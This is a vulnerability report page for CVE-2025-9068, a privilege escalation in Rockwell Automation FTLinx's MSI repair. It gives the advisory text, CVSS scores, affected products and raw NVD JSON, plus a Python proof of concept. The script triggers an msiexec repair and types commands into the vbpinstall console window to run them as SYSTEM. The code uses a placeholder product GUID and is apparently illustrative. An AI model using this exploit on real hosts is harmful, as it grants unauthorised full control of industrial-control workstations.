Security Vulnerability Report
中文
CVE-2025-9068 CVSS 7.8 HIGH

CVE-2025-9068

Published: 2025-10-14 13:15:40
Last Modified: 2025-10-24 17:27:13

Description

A security issue exists within the Rockwell Automation Driver Package x64 Microsoft Installer File (MSI) repair functionality, installed with FTLinx. Authenticated attackers with valid Windows Users credentials can initiate a repair and hijack the resulting console window for vbpinstall.exe. This allows the launching of a command prompt running with SYSTEM-level privileges, allowing full access to all files, processes, and system resources.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:rockwellautomation:factorytalk_linx:*:*:*:*:*:*:*:* - VULNERABLE
Rockwell Automation Driver Package x64 (随FTLinx安装的所有版本)
FTLinx 所有受影响的版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-9068 - Rockwell Automation FTLinx MSI Repair Privilege Escalation PoC # This PoC demonstrates the concept of hijacking the SYSTEM-level console window # during the MSI repair operation of Rockwell Automation Driver Package x64. import subprocess import ctypes import time import win32gui import win32con import win32process import win32api def find_vbpinstall_window(): """Find the vbpinstall.exe console window""" def callback(hwnd, hwnds): if win32gui.IsWindowVisible(hwnd): title = win32gui.GetWindowText(hwnd) if 'vbpinstall' in title.lower() or 'vbp' in title.lower(): hwnds.append(hwnd) return True hwnds = [] win32gui.EnumWindows(callback, hwnds) return hwnds def trigger_msi_repair(): """Trigger the MSI repair operation for Rockwell Automation Driver Package""" # Find the Rockwell Automation Driver Package MSI product code # The product GUID varies by installation product_code = "{ROCKWELL-DRIVER-PACKAGE-GUID}" # Execute MSI repair with user-triggerable flag cmd = f'msiexec /fa "{product_code}" /qn' subprocess.Popen(cmd, shell=True) print(f"[*] Triggered MSI repair: {cmd}") def hijack_console(hwnd): """Hijack the SYSTEM-level console window and execute commands""" # Get the process ID of the SYSTEM-level process _, pid = win32process.GetWindowThreadProcessId(hwnd) print(f"[*] Found vbpinstall.exe window (PID: {pid})") # Bring window to foreground win32gui.SetForegroundWindow(hwnd) win32gui.ShowWindow(hwnd, win32con.SW_RESTORE) # Send command to the hijacked console # The command runs with SYSTEM privileges command = "cmd.exe /c whoami > C:\\temp\\system_proof.txt\r\n" for char in command: win32api.SendMessage(hwnd, win32con.WM_CHAR, ord(char), 0) time.sleep(0.01) print("[+] Console hijacked - command executed with SYSTEM privileges") def main(): print("=" * 60) print("CVE-2025-9068 - Rockwell Automation Privilege Escalation PoC") print("=" * 60) # Step 1: Trigger the MSI repair trigger_msi_repair() # Step 2: Wait for vbpinstall.exe to start print("[*] Waiting for vbpinstall.exe to launch...") time.sleep(5) # Step 3: Find and hijack the console window windows = find_vbpinstall_window() if windows: hijack_console(windows[0]) else: print("[-] Could not find vbpinstall.exe window") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-9068", "sourceIdentifier": "[email protected]", "published": "2025-10-14T13:15:40.093", "lastModified": "2025-10-24T17:27:13.030", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security issue exists within the Rockwell Automation Driver Package x64 Microsoft Installer File (MSI) repair functionality, installed with FTLinx. Authenticated attackers with valid Windows Users credentials can initiate a repair and hijack the resulting console window for vbpinstall.exe. This allows the launching of a command prompt running with SYSTEM-level privileges, allowing full access to all files, processes, and system resources."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rockwellautomation:factorytalk_linx:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.50", "matchCriteriaId": "23BAB4E2-83AE-4C44-AE27-BFCF753D9BB5"}]}]}], "references": [{"url": "https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1754.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}